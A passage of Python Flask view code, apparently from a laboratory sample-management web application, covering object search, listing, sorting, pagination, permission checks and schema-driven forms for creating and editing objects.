'read': Permissions.READ,
'write': Permissions.WRITE,
'grant': Permissions.GRANT
}.get(flask.request.args.get('user_permissions', '').lower())
else:
user_permissions = None
try:
doi = logic.publications.simplify_doi(flask.request.args.get('doi', ''))
except logic.errors.InvalidDOIError:
doi = None
try:
location_id = int(flask.request.args.get('location', ''))
location = get_location(location_id)
object_ids_at_location = get_object_ids_at_location(location_id)
except ValueError:
location_id = None
location = None
object_ids_at_location = None
except LocationDoesNotExistError:
location_id = None
location = None
object_ids_at_location = None
try:
action_id = int(flask.request.args.get('action', ''))
except ValueError:
action_id = None
if action_id is not None:
action = get_action_with_translation_in_language(action_id, user_language_id, use_fallback=True)
action_type = get_action_type_with_translation_in_language(action.type_id, user_language_id)
action_schema = action.schema
if not display_properties:
display_properties = action_schema.get('displayProperties', [])
for property_name in display_properties:
display_property_titles[property_name] = action_schema['properties'][property_name]['title']
else:
action = None
action_type_id = flask.request.args.get('t', '')
if action_type_id is not None:
try:
action_type_id = int(action_type_id)
except ValueError:
# ensure old links still function
action_type_id = {
'samples': models.ActionType.SAMPLE_CREATION,
'measurements': models.ActionType.MEASUREMENT,
'simulations': models.ActionType.SIMULATION
}.get(action_type_id, None)
if action_type_id is not None:
try:
action_type = get_action_type_with_translation_in_language(
action_type_id=action_type_id,
language_id=user_language_id
)
except ActionTypeDoesNotExistError:
action_type = None
else:
action_type = None
project_permissions = None
if display_properties:
name_only = False
try:
project_id = int(flask.request.args.get('project', ''))
except ValueError:
project_id = None
if project_id is not None:
if Permissions.READ not in get_user_project_permissions(project_id=project_id, user_id=flask_login.current_user.id, include_groups=True):
return flask.abort(403)
project = get_project(project_id)
project_permissions = {
'read': Permissions.READ,
'write': Permissions.WRITE,
'grant': Permissions.GRANT
}.get(flask.request.args.get('project_permissions', '').lower())
else:
project = None
group_permissions = None
try:
group_id = int(flask.request.args.get('group', ''))
except ValueError:
group_id = None
if group_id is not None:
try:
group = logic.groups.get_group(group_id)
group_member_ids = logic.groups.get_group_member_ids(group_id)
except logic.errors.GroupDoesNotExistError:
group = None
else:
if flask_login.current_user.id not in group_member_ids:
return flask.abort(403)
else:
group = None
if group is not None:
group_permissions = {
'read': Permissions.READ,
'write': Permissions.WRITE,
'grant': Permissions.GRANT
}.get(flask.request.args.get('group_permissions', '').lower())
else:
group_permissions = None
if flask.request.args.get('limit', '') == 'all':
limit = None
else:
try:
limit = int(flask.request.args.get('limit', ''))
except ValueError:
limit = None
else:
if limit <= 0:
limit = None
elif limit >= 1000:
limit = 1000
# default objects per page
if limit is None:
limit = get_user_settings(flask_login.current_user.id)['OBJECTS_PER_PAGE']
else:
set_user_settings(flask_login.current_user.id, {'OBJECTS_PER_PAGE': limit})
try:
offset = int(flask.request.args.get('offset', ''))
except ValueError:
offset = None
else:
if offset < 0:
offset = None
elif offset > 100000000:
offset = 100000000
if limit is not None and offset is None:
offset = 0
sorting_order_name = flask.request.args.get('order', None)
if sorting_order_name == 'asc':
sorting_order = object_sorting.ascending
elif sorting_order_name == 'desc':
sorting_order = object_sorting.descending
else:
sorting_order = None
sorting_property_name = flask.request.args.get('sortby', None)
if sorting_order is None:
if sorting_property_name is None:
sorting_order_name = 'desc'
sorting_order = object_sorting.descending
else:
sorting_order_name = 'asc'
sorting_order = object_sorting.ascending
if sorting_property_name is None:
sorting_property_name = '_object_id'
else:
name_only = False
if sorting_property_name == '_object_id':
sorting_property = object_sorting.object_id()
elif sorting_property_name == '_creation_date':
sorting_property = object_sorting.creation_date()
elif sorting_property_name == '_last_modification_date':
sorting_property = object_sorting.last_modification_date()
else:
sorting_property = object_sorting.property_value(sorting_property_name)
sorting_function = sorting_order(sorting_property)
query_string = flask.request.args.get('q', '')
if query_string:
name_only = False
search_tree = None
use_advanced_search = flask.request.args.get('advanced', None) is not None
must_use_advanced_search = use_advanced_search
advanced_search_had_error = False
additional_search_notes = []
if not use_advanced_search and query_string:
if user_id is None:
users = get_users_by_name(query_string)
if len(users) == 1:
user = users[0]
user_id = user.id
query_string = ''
elif len(users) > 1:
additional_search_notes.append(('error', "There are multiple users with this name.", 0, 0))
if doi is None and query_string.startswith('doi:'):
try:
doi = logic.publications.simplify_doi(query_string)
query_string = ''
except logic.errors.InvalidDOIError:
pass
try:
filter_func, search_tree, use_advanced_search = generate_filter_func(query_string, use_advanced_search)
except Exception:
# TODO: ensure that advanced search does not cause exceptions
if use_advanced_search:
advanced_search_had_error = True
def filter_func(data, search_notes):
""" Return all objects"""
search_notes.append(('error', "Unable to parse search expression", 0, len(query_string)))
return False
else:
raise
filter_func, search_notes = wrap_filter_func(filter_func)
search_notes.extend(additional_search_notes)
if user_id is None or user_permissions is not None:
object_ids_for_user = None
else:
object_ids_for_user = user_log.get_user_related_object_ids(user_id)
if doi is None:
object_ids_for_doi = None
else:
object_ids_for_doi = logic.publications.get_object_ids_linked_to_doi(doi)
if use_advanced_search and not must_use_advanced_search:
search_notes.append(('info', _("The advanced search was used automatically. Search for \"%(query_string)s\" to use the simple search.", query_string=query_string), 0, 0))
try:
object_ids = None
if object_ids_at_location is not None:
if object_ids is None:
object_ids = set()
object_ids = object_ids.union(object_ids_at_location)
if object_ids_for_user is not None:
if object_ids is None:
object_ids = set()
object_ids = object_ids.union(object_ids_for_user)
if object_ids_for_doi is not None:
if object_ids is None:
object_ids = set()
object_ids = object_ids.union(object_ids_for_doi)
if object_ids is not None:
pagination_enabled = False
limit = None
offset = None
if object_ids is not None and not object_ids:
objects = []
num_objects_found = 0
else:
num_objects_found_list = []
objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.READ,
filter_func=filter_func,
sorting_func=sorting_function,
limit=limit,
offset=offset,
action_id=action_id,
action_type_id=action_type.id if action_type is not None else None,
other_user_id=user_id,
other_user_permissions=user_permissions,
project_id=project_id,
project_permissions=project_permissions,
group_id=group_id,
group_permissions=group_permissions,
object_ids=object_ids,
num_objects_found=num_objects_found_list,
name_only=name_only
)
num_objects_found = num_objects_found_list[0]
except Exception as e:
search_notes.append(('error', "Error during search: {}".format(e), 0, 0))
objects = []
num_objects_found = 0
if any(note[0] == 'error' for note in search_notes):
objects = []
advanced_search_had_error = True
cached_actions = {}
cached_users = {}
for i, obj in enumerate(objects):
if obj.version_id == 0:
original_object = obj
else:
original_object = get_object(object_id=obj.object_id, version_id=0)
if obj.action_id not in cached_actions:
cached_actions[obj.action_id] = get_action(obj.action_id)
if obj.user_id not in cached_users:
cached_users[obj.user_id] = get_user(obj.user_id)
if original_object.user_id not in cached_users:
cached_users[original_object.user_id] = get_user(original_object.user_id)
objects[i] = {
'object_id': obj.object_id,
'created_by': cached_users[original_object.user_id],
'created_at': original_object.utc_datetime,
'modified_by': cached_users[obj.user_id],
'last_modified_at': obj.utc_datetime,
'data': obj.data,
'schema': obj.schema,
'action': cached_actions[obj.action_id],
'display_properties': {}
}
for property_name in display_properties:
if property_name not in objects[i]['data'] or '_type' not in objects[i]['data'][property_name] or property_name not in objects[i]['schema']['properties']:
objects[i]['display_properties'][property_name] = None
continue
objects[i]['display_properties'][property_name] = (objects[i]['data'][property_name], objects[i]['schema']['properties'][property_name])
if action_id is None:
show_action = True
else:
show_action = False
def build_modified_url(**kwargs):
return flask.url_for(
'.objects',
**{k: v for k, v in flask.request.args.items() if k not in kwargs},
**kwargs
)
action_ids = {
object['action'].id for object in objects
}
action_translations = {}
for id in action_ids:
action_translations[id] = logic.action_translations.get_action_translation_for_action_in_language(
action_id=id,
language_id=user_language_id,
use_fallback=True
)
return flask.render_template(
'objects/objects.html',
objects=objects,
display_properties=display_properties,
display_property_titles=display_property_titles,
search_query=query_string,
action=action,
action_translations=action_translations,
action_id=action_id,
action_type=action_type,
project=project,
project_id=project_id,
group=group,
group_id=group_id,
location_id=location_id,
location=location,
user_id=user_id,
user=user,
doi=doi,
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
get_instrument_translation_for_instrument_in_language=logic.instrument_translations.get_instrument_translation_for_instrument_in_language,
build_modified_url=build_modified_url,
sorting_property=sorting_property_name,
sorting_order=sorting_order_name,
limit=limit,
offset=offset,
pagination_enabled=pagination_enabled,
num_objects_found=num_objects_found,
show_action=show_action,
use_advanced_search=use_advanced_search,
must_use_advanced_search=must_use_advanced_search,
advanced_search_had_error=advanced_search_had_error,
search_notes=search_notes,
search_tree=search_tree
)
@jinja_filter
def to_datatype(obj):
return json.loads(json.dumps(obj), object_hook=JSONEncoder.object_hook)
def get_sub_data_and_schema(data, schema, id_prefix):
sub_data = data
sub_schema = schema
try:
for key in id_prefix.split('__'):
if sub_schema['type'] == 'array':
key = int(key)
sub_schema = sub_schema['items']
elif sub_schema['type'] == 'object':
sub_schema = sub_schema['properties'][key]
else:
raise ValueError('invalid type')
if isinstance(key, int):
while key >= len(sub_data):
sub_data.append(generate_placeholder(sub_schema))
elif key not in sub_data:
sub_data[key] = generate_placeholder(sub_schema)
sub_data = sub_data[key]
if sub_schema['type'] != 'array':
raise ValueError('invalid type')
except (ValueError, KeyError, IndexError, TypeError):
# TODO: error handling/logging?
raise ValueError('invalid action')
return sub_data, sub_schema
def apply_action_to_form_data(action, form_data):
new_form_data = form_data
action_id_prefix, action_index, action_type = action[len('action_'):].rsplit('__', 2)
if action_type == 'delete':
deleted_item_index = int(action_index)
parent_id_prefix = action_id_prefix
new_form_data = {}
for name in form_data:
if not name.startswith(parent_id_prefix + '__'):
new_form_data[name] = form_data[name]
else:
item_index, id_suffix = name[len(parent_id_prefix) + 2:].split('__', 1)
item_index = int(item_index)
if item_index < deleted_item_index:
new_form_data[name] = form_data[name]
if item_index > deleted_item_index:
new_name = parent_id_prefix + '__' + str(item_index - 1) + '__' + id_suffix
new_form_data[new_name] = form_data[name]
return new_form_data
def apply_action_to_data(action, data, schema):
action_id_prefix, action_index, action_type = action[len('action_'):].rsplit('__', 2)
if action_type not in ('add', 'delete', 'addcolumn', 'deletecolumn'):
raise ValueError('invalid action')
sub_data, sub_schema = get_sub_data_and_schema(data, schema, action_id_prefix.split('__', 1)[1])
if action_type in ('addcolumn', 'deletecolumn') and (sub_schema["style"] != "table" or sub_schema["items"]["type"] != "array"):
raise ValueError('invalid action')
num_existing_items = len(sub_data)
if action_type == 'add':
if 'maxItems' not in sub_schema or num_existing_items < sub_schema["maxItems"]:
sub_data.append(generate_placeholder(sub_schema["items"]))
if isinstance(sub_data[-1], list) and sub_schema.get('style') == 'table':
num_existing_columns = sub_schema["items"].get("minItems", 0)
for row in sub_data:
num_existing_columns = max(num_existing_columns, len(row))
while len(sub_data[-1]) < num_existing_columns:
sub_data[-1].append(None)
elif action_type == 'delete':
action_index = int(action_index)
if ('minItems' not in sub_schema or num_existing_items > sub_schema["minItems"]) and action_index < num_existing_items:
del sub_data[action_index]
else:
num_existing_columns = sub_schema["items"].get("minItems", 0)
for row in sub_data:
num_existing_columns = max(num_existing_columns, len(row))
if action_type == 'addcolumn':
if 'maxItems' not in sub_schema["items"] or num_existing_columns < sub_schema["items"]["maxItems"]:
num_existing_columns += 1
for row in sub_data:
while len(row) < num_existing_columns:
row.append(generate_placeholder(sub_schema["items"]["items"]))
elif action_type == 'deletecolumn':
if num_existing_columns > sub_schema.get("minItems", 0):
num_existing_columns -= 1
for row in sub_data:
while len(row) > num_existing_columns:
del row[-1]
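# Editor note (illustrative): the action names parsed above follow the pattern
#   action_<id prefix>__<index>__<type>
# with <type> one of 'add', 'delete', 'addcolumn' or 'deletecolumn'; an assumed
# name like 'action_object__measurements__1__delete' would remove entry 1 from
# the 'measurements' array, while '...__0__add' appends a new placeholder item.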
def show_object_form(object, action, previous_object=None, should_upgrade_schema=False, placeholder_data=None):
if object is None and previous_object is None:
data = generate_placeholder(action.schema)
if placeholder_data:
for path, value in placeholder_data.items():
try:
sub_data = data
for step in path[:-1]:
sub_data = sub_data[step]
sub_data[path[-1]] = value
except Exception:
# Ignore invalid placeholder data
pass
elif object is None and previous_object is not None:
data = logic.schemas.copy_data(previous_object.data, previous_object.schema)
else:
data = object.data
previous_object_schema = None
mode = 'edit'
if should_upgrade_schema:
mode = 'upgrade'
assert object is not None
schema = action.schema
data, upgrade_warnings = logic.schemas.convert_to_schema(object.data, object.schema, action.schema)
for upgrade_warning in upgrade_warnings:
flask.flash(upgrade_warning, 'warning')
elif object is not None:
schema = object.schema
elif previous_object is not None:
schema = previous_object.schema
previous_object_schema = schema
else:
schema = action.schema
if action is not None and action.instrument is not None and flask_login.current_user in action.instrument.responsible_users:
may_create_log_entry = True
create_log_entry_default = action.instrument.create_log_entry_default
instrument_log_categories = logic.instrument_log_entries.get_instrument_log_categories(action.instrument.id)
if 'create_instrument_log_entry' in flask.request.form:
category_ids = []
for category_id in flask.request.form.getlist('instrument_log_categories'):
try:
if int(category_id) in [category.id for category in instrument_log_categories]:
category_ids.append(int(category_id))
except Exception:
pass
else:
category_ids = None
else:
instrument_log_categories = None
category_ids = None
create_log_entry_default = None
may_create_log_entry = False
permissions_for_group_id = None
permissions_for_project_id = None
copy_permissions_object_id = None
if object is None:
if flask.request.form.get('permissions_method') == 'copy_permissions' and flask.request.form.get('copy_permissions_object_id'):
copy_permissions_object_id = flask.request.form.get('copy_permissions_object_id')
try:
copy_permissions_object_id = int(copy_permissions_object_id)
if Permissions.READ not in get_user_object_permissions(copy_permissions_object_id, flask_login.current_user.id):
flask.flash(_("Unable to copy permissions. Default permissions will be applied."), 'error')
copy_permissions_object_id = None
except Exception:
flask.flash(_("Unable to copy permissions. Default permissions will be applied."), 'error')
copy_permissions_object_id = None
elif flask.request.form.get('permissions_method') == 'permissions_for_group' and flask.request.form.get('permissions_for_group_group_id'):
permissions_for_group_id = flask.request.form.get('permissions_for_group_group_id')
try:
permissions_for_group_id = int(permissions_for_group_id)
if flask_login.current_user.id not in logic.groups.get_group_member_ids(permissions_for_group_id):
flask.flash(_("Unable to grant permissions to basic group. Default permissions will be applied."), 'error')
permissions_for_group_id = None
except Exception:
flask.flash(_("Unable to grant permissions to basic group. Default permissions will be applied."), 'error')
permissions_for_group_id = None
elif flask.request.form.get('permissions_method') == 'permissions_for_project' and flask.request.form.get('permissions_for_project_project_id'):
permissions_for_project_id = flask.request.form.get('permissions_for_project_project_id')
try:
permissions_for_project_id = int(permissions_for_project_id)
if flask_login.current_user.id not in logic.projects.get_project_member_user_ids_and_permissions(permissions_for_project_id, include_groups=True):
flask.flash(_("Unable to grant permissions to project group. Default permissions will be applied."), 'error')
permissions_for_project_id = None
except Exception:
flask.flash(_("Unable to grant permissions to project group. Default permissions will be applied."), 'error')
permissions_for_project_id = None
if previous_object is not None:
action_id = previous_object.action_id
previous_object_id = previous_object.id
has_grant_for_previous_object = Permissions.GRANT in get_user_object_permissions(user_id=flask_login.current_user.id, object_id=previous_object_id)
else:
action_id = action.id
previous_object_id = None
has_grant_for_previous_object = False
errors = []
object_errors = {}
form_data = {}
previous_actions = []
serializer = itsdangerous.URLSafeSerializer(flask.current_app.config['SECRET_KEY'])
form = ObjectForm()
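    # Handle a submitted form (any non-GET request that passes form validation)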
if flask.request.method != 'GET' and form.validate_on_submit():
raw_form_data = {key: flask.request.form.getlist(key) for key in flask.request.form}
form_data = {k: v[0] for k, v in raw_form_data.items()}
if 'input_num_batch_objects' in form_data:
try:
num_objects_in_batch = int(form_data['input_num_batch_objects'])
except ValueError:
try:
                    # The form allows notations like '1.2e1' for '12'; however,
                    # Python can only parse these as floats
num_objects_in_batch = float(form_data['input_num_batch_objects'])
if num_objects_in_batch == int(num_objects_in_batch):
num_objects_in_batch = int(num_objects_in_batch)
else:
raise
except ValueError:
errors.append('input_num_batch_objects')
num_objects_in_batch = None
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
else:
num_objects_in_batch = None
if 'previous_actions' in flask.request.form:
try:
previous_actions = serializer.loads(flask.request.form['previous_actions'])
except itsdangerous.BadData:
flask.abort(400)
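        # "action_submit" is only set when the form was submitted via its submit
        # button; add/delete buttons for arrays and table columns are handled below.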
if "action_submit" in form_data:
# The object name might need the batch number to match the pattern
if schema.get('batch', False) and num_objects_in_batch is not None:
name_suffix_format = schema.get('batch_name_format', '{:d}')
try:
name_suffix_format.format(1)
except (ValueError, KeyError):
name_suffix_format = '{:d}'
if name_suffix_format:
example_name_suffix = name_suffix_format.format(1)
else:
example_name_suffix = ''
if 'object__name__text' in form_data:
batch_base_name = form_data['object__name__text']
raw_form_data['object__name__text'] = [batch_base_name + example_name_suffix]
else:
enabled_languages = form_data.get('object__name__text_languages', [])
if 'en' not in enabled_languages:
enabled_languages.append('en')
for language_code in enabled_languages:
batch_base_name = form_data.get('object__name__text_' + language_code, '')
raw_form_data['object__name__text_' + language_code] = [batch_base_name + example_name_suffix]
else:
batch_base_name = None
name_suffix_format = None
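            # Parse the submitted form fields into object data matching the schema,
            # collecting any per-field errors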
object_data, object_errors = parse_form_data(raw_form_data, schema)
errors += object_errors
if object_data is not None and not errors:
try:
validate(object_data, schema)
except ValidationError:
# TODO: proper logging
print('object schema validation failed')
# TODO: handle error
flask.abort(400)
for markdown in logic.markdown_to_html.get_markdown_from_object_data(object_data):
markdown_as_html = logic.markdown_to_html.markdown_to_safe_html(markdown)
logic.markdown_images.mark_referenced_markdown_images_as_permanent(markdown_as_html)
if object is None:
if schema.get('batch', False) and num_objects_in_batch is not None:
if 'name' in object_data and 'text' in object_data['name'] and name_suffix_format is not None and batch_base_name is not None:
data_sequence = []
for i in range(1, num_objects_in_batch + 1):
if name_suffix_format:
name_suffix = name_suffix_format.format(i)
else:
name_suffix = ''
object_data['name']['text'] = batch_base_name + name_suffix
data_sequence.append(deepcopy(object_data))
else:
data_sequence = [object_data] * num_objects_in_batch
objects = create_object_batch(
action_id=action.id,
data_sequence=data_sequence,
user_id=flask_login.current_user.id,
copy_permissions_object_id=copy_permissions_object_id,
permissions_for_group_id=permissions_for_group_id,
permissions_for_project_id=permissions_for_project_id
)
object_ids = [object.id for object in objects]
if category_ids is not None:
log_entry = logic.instrument_log_entries.create_instrument_log_entry(
instrument_id=action.instrument.id,
user_id=flask_login.current_user.id,
content='',
category_ids=category_ids
)
for object_id in object_ids:
logic.instrument_log_entries.create_instrument_log_object_attachment(
instrument_log_entry_id=log_entry.id,
object_id=object_id
)
flask.flash(_('The objects were created successfully.'), 'success')
return flask.redirect(flask.url_for('.objects', ids=','.join([str(object_id) for object_id in object_ids])))
else:
object = create_object(
action_id=action.id,
data=object_data,
user_id=flask_login.current_user.id,
previous_object_id=previous_object_id,
schema=previous_object_schema,
copy_permissions_object_id=copy_permissions_object_id,
permissions_for_group_id=permissions_for_group_id,
permissions_for_project_id=permissions_for_project_id
)
if category_ids is not None:
log_entry = logic.instrument_log_entries.create_instrument_log_entry(
instrument_id=action.instrument.id,
user_id=flask_login.current_user.id,
content='',
category_ids=category_ids
)
logic.instrument_log_entries.create_instrument_log_object_attachment(
instrument_log_entry_id=log_entry.id,
object_id=object.id
)
flask.flash(_('The object was created successfully.'), 'success')
else:
if object_data != object.data or schema != object.schema:
update_object(object_id=object.id, user_id=flask_login.current_user.id, data=object_data, schema=schema)
flask.flash(_('The object was updated successfully.'), 'success')
return flask.redirect(flask.url_for('.object', object_id=object.id))
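        # An array or table column add/delete button was pressed: record it so it
        # can be re-applied to the data and form data together with previous actions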
elif any(name.startswith('action_object__') and (name.endswith('__delete') or name.endswith('__add') or name.endswith('__addcolumn') or name.endswith('__deletecolumn')) for name in form_data):
action = [name for name in form_data if name.startswith('action_')][0]
previous_actions.append(action)
if previous_actions:
try:
for action in previous_actions:
apply_action_to_data(action, data, schema)
form_data = apply_action_to_form_data(previous_actions[-1], form_data)
except ValueError:
flask.abort(400)
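    # Collect the objects that may be referenced in object reference fields,
    # unless objects are loaded asynchronously in the background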
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
referencable_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.READ
)
if object is not None:
referencable_objects = [
referencable_object
for referencable_object in referencable_objects
if referencable_object.object_id != object.object_id
]
else:
referencable_objects = []
existing_objects = []
sorted_actions = get_sorted_actions_for_user(
user_id=flask_login.current_user.id
)
action_type_id_by_action_id = {}
for action_type in get_action_types():
for action in get_actions(action_type.id):
action_type_id_by_action_id[action.id] = action_type.id
tags = [{'name': tag.name, 'uses': tag.uses} for tag in logic.tags.get_tags()]
users = get_users(exclude_hidden=True)
users.sort(key=lambda user: user.id)
english = get_language(Language.ENGLISH)
if object is None:
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
existing_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.GRANT
)
user_groups = logic.groups.get_user_groups(flask_login.current_user.id)
user_projects = logic.projects.get_user_projects(flask_login.current_user.id, include_groups=True)
return flask.render_template(
'objects/forms/form_create.html',
action_id=action_id,
schema=schema,
data=data,
errors=errors,
object_errors=object_errors,
form_data=form_data,
previous_actions=serializer.dumps(previous_actions),
form=form,
can_copy_permissions=True,
existing_objects=existing_objects,
user_groups=user_groups,
user_projects=user_projects,
referencable_objects=referencable_objects,
sorted_actions=sorted_actions,
action_type_id_by_action_id=action_type_id_by_action_id,
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
ActionType=models.ActionType,
datetime=datetime,
tags=tags,
users=users,
may_create_log_entry=may_create_log_entry,
instrument_log_categories=instrument_log_categories,
create_log_entry_default=create_log_entry_default,
previous_object_id=previous_object_id,
has_grant_for_previous_object=has_grant_for_previous_object,
languages=get_languages(only_enabled_for_input=True),
ENGLISH=english
)
else:
return flask.render_template(
'objects/forms/form_edit.html',
schema=schema,
data=data,
object_id=object.object_id,
errors=errors,
object_errors=object_errors,
form_data=form_data,
previous_actions=serializer.dumps(previous_actions),
form=form,
referencable_objects=referencable_objects,
sorted_actions=sorted_actions,
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
action_type_id_by_action_id=action_type_id_by_action_id,
ActionType=models.ActionType,
datetime=datetime,
tags=tags,
users=users,
mode=mode,
languages=get_languages(),
ENGLISH=english
)
def build_object_location_assignment_confirmation_url(object_location_assignment_id: int) -> str:
confirmation_url = flask.url_for(
'frontend.accept_responsibility_for_object',
t=logic.security_tokens.generate_token(
object_location_assignment_id,
salt='confirm_responsibility',
secret_key=flask.current_app.config['SECRET_KEY']
),
_external=True
)
return confirmation_url
def get_project_if_it_exists(project_id):
try:
return get_project(project_id)
except logic.errors.ProjectDoesNotExistError:
return None
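# Render the object page in inline edit mode, combining the regular view context
# with the form context needed to edit individual fields in place.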
def show_inline_edit(obj, action):
# Set view attributes
related_objects_tree = logic.object_relationships.build_related_objects_tree(obj.id, flask_login.current_user.id)
user_language_id = get_user_language(flask_login.current_user).id
english = get_language(Language.ENGLISH)
object_id = obj.id
user_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
user_may_grant = Permissions.GRANT in user_permissions
user_may_use_as_template = Permissions.READ in get_user_action_permissions(obj.action_id, user_id=flask_login.current_user.id)
    new_schema_available = action.schema != obj.schema
instrument = get_instrument_with_translation_in_language(action.instrument_id,
user_language_id) if action.instrument else None
object_type = get_action_type_with_translation_in_language(
action_type_id=action.type_id,
language_id=user_language_id
).translation.object_name
object_log_entries = object_log.get_object_log_entries(object_id=obj.id, user_id=flask_login.current_user.id)
dataverse_enabled = bool(flask.current_app.config['DATAVERSE_URL'])
if dataverse_enabled:
dataverse_url = logic.dataverse_export.get_dataverse_url(obj.id)
show_dataverse_export = not dataverse_url
else:
dataverse_url = None
show_dataverse_export = False
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
token = serializer.dumps([flask_login.current_user.id, object_id])
mobile_upload_url = flask.url_for('.mobile_file_upload', object_id=object_id, token=token, _external=True)
mobile_upload_qrcode = generate_qrcode(mobile_upload_url, should_cache=False)
object_url = flask.url_for('.object', object_id=object_id, _external=True)
object_qrcode = generate_qrcode(object_url, should_cache=True)
location_form = ObjectLocationAssignmentForm()
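    # Flatten the location tree into select choices, prefixing each location
    # with the names of its parent locations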
locations_map, locations_tree = get_locations_tree()
locations = [('-1', '—')]
unvisited_location_ids_prefixes_and_subtrees = [(location_id, '', locations_tree[location_id]) for location_id in
locations_tree]
while unvisited_location_ids_prefixes_and_subtrees:
location_id, prefix, subtree = unvisited_location_ids_prefixes_and_subtrees.pop(0)
location = locations_map[location_id]
locations.append(
(str(location_id), '{}{} (#{})'.format(prefix, get_translated_text(location.name), location.id)))
for location_id in sorted(subtree, key=lambda location_id: get_translated_text(locations_map[location_id].name),
reverse=True):
unvisited_location_ids_prefixes_and_subtrees.insert(
0, (location_id, f'{prefix}{get_translated_text(location.name)} / ', subtree[location_id])
)
location_form.location.choices = locations
possible_responsible_users = [('-1', '—')]
for user in logic.users.get_users(exclude_hidden=True):
possible_responsible_users.append((str(user.id), '{} (#{})'.format(user.name, user.id)))
location_form.responsible_user.choices = possible_responsible_users
measurement_actions = logic.action_translations.get_actions_with_translation_in_language(user_language_id,
models.ActionType.MEASUREMENT,
use_fallback=True)
favorite_action_ids = logic.favorites.get_user_favorite_action_ids(flask_login.current_user.id)
favorite_measurement_actions = [
action
for action in measurement_actions
if action.id in favorite_action_ids and not action.is_hidden
]
    # Sort by: user name (actions without a user first), instrument name (independent actions first), action name
favorite_measurement_actions.sort(key=lambda action: (
action.user.name.lower() if action.user else '',
get_instrument_with_translation_in_language(action.instrument_id,
user_language_id).translation.name.lower() if action.instrument else '',
action.translation.name.lower()
))
publication_form = ObjectPublicationForm()
object_publications = logic.publications.get_publications_for_object(object_id=obj.id)
user_may_link_publication = True
notebook_templates = get_notebook_templates(
object_id=obj.id,
data=obj.data,
schema=obj.schema,
user_id=flask_login.current_user.id
)
linked_project = logic.projects.get_project_linked_to_object(object_id)
object_languages = logic.languages.get_languages_in_object_data(obj.data)
languages = []
for lang_code in object_languages:
languages.append(get_language_by_lang_code(lang_code))
all_languages = get_languages()
metadata_language = flask.request.args.get('language', None)
if not any(
language.lang_code == metadata_language
for language in languages
):
metadata_language = None
view_kwargs = {
"template_mode": "inline_edit",
"show_object_type_and_id_on_object_page_text": get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TYPE_AND_ID_ON_OBJECT_PAGE"],
"show_object_title": get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TITLE"],
"measurement_type_name": logic.action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=logic.actions.models.ActionType.MEASUREMENT,
language_id=logic.languages.get_user_language(flask_login.current_user).id,
use_fallback=True
).name,
"metadata_language": metadata_language,
"languages": languages,
"all_languages": all_languages,
"SUPPORTED_LOCALES": logic.locale.SUPPORTED_LOCALES,
"ENGLISH": english,
"object_type": object_type,
"action": action,
"action_type": get_action_type_with_translation_in_language(action.type_id, user_language_id),
"instrument": instrument,
"schema": obj.schema,
"data": obj.data,
"object_log_entries": object_log_entries,
"ObjectLogEntryType": ObjectLogEntryType,
"last_edit_datetime": obj.utc_datetime,
"last_edit_user": get_user(obj.user_id),
"object_id": object_id,
"user_may_edit": True,
"user_may_comment": True,
"comments": comments.get_comments_for_object(object_id),
"comment_form": CommentForm(),
"files": logic.files.get_files_for_object(object_id),
"file_source_instrument_exists": False,
"file_source_jupyterhub_exists": False,
"file_form": FileForm(),
"external_link_form": ExternalLinkForm(),
"external_link_invalid": 'invalid_link' in flask.request.args,
"mobile_upload_url": mobile_upload_url,
"mobile_upload_qrcode": mobile_upload_qrcode,
"notebook_templates": notebook_templates,
"object_qrcode": object_qrcode,
"object_url": object_url,
"restore_form": None,
"version_id": obj.version_id,
"user_may_grant": user_may_grant,
"favorite_measurement_actions": favorite_measurement_actions,
"FileLogEntryType": FileLogEntryType,
"file_information_form": FileInformationForm(),
"file_hiding_form": FileHidingForm(),
"new_schema_available": new_schema_available,
"related_objects_tree": related_objects_tree,
"object_publications": object_publications,
"user_may_link_publication": user_may_link_publication,
"user_may_use_as_template": user_may_use_as_template,
"show_dataverse_export": show_dataverse_export,
"dataverse_url": dataverse_url,
"publication_form": publication_form,
"get_object": get_object,
"get_object_if_current_user_has_read_permissions": get_object_if_current_user_has_read_permissions,
"get_object_location_assignment": get_object_location_assignment,
"get_user": get_user,
"get_location": get_location,
"PAGE_SIZES": PAGE_SIZES,
"HORIZONTAL_LABEL_MARGIN": HORIZONTAL_LABEL_MARGIN,
"VERTICAL_LABEL_MARGIN": VERTICAL_LABEL_MARGIN,
"mm": mm,
"object_location_assignments": get_object_location_assignments(object_id),
"build_object_location_assignment_confirmation_url": build_object_location_assignment_confirmation_url,
"user_may_assign_location": True,
"location_form": location_form,
"project": linked_project,
"get_project": get_project_if_it_exists,
"get_action_type": get_action_type,
"get_action_type_with_translation_in_language": get_action_type_with_translation_in_language,
"get_instrument_with_translation_in_language": get_instrument_with_translation_in_language
}
# form kwargs
if action is not None and action.instrument is not None and flask_login.current_user in action.instrument.responsible_users:
instrument_log_categories = logic.instrument_log_entries.get_instrument_log_categories(action.instrument.id)
if 'create_instrument_log_entry' in flask.request.form:
category_ids = []
for category_id in flask.request.form.getlist('instrument_log_categories'):
try:
if int(category_id) in [category.id for category in instrument_log_categories]:
category_ids.append(int(category_id))
except Exception:
pass
errors = []
object_errors = {}
form_data = {}
previous_actions = []
serializer = itsdangerous.URLSafeSerializer(flask.current_app.config['SECRET_KEY'])
form = ObjectForm()
if flask.request.method != 'GET' and form.validate_on_submit():
raw_form_data = {key: flask.request.form.getlist(key) for key in flask.request.form}
form_data = {k: v[0] for k, v in raw_form_data.items()}
if 'input_num_batch_objects' in form_data:
try:
num_objects_in_batch = int(form_data['input_num_batch_objects'])
except ValueError:
try:
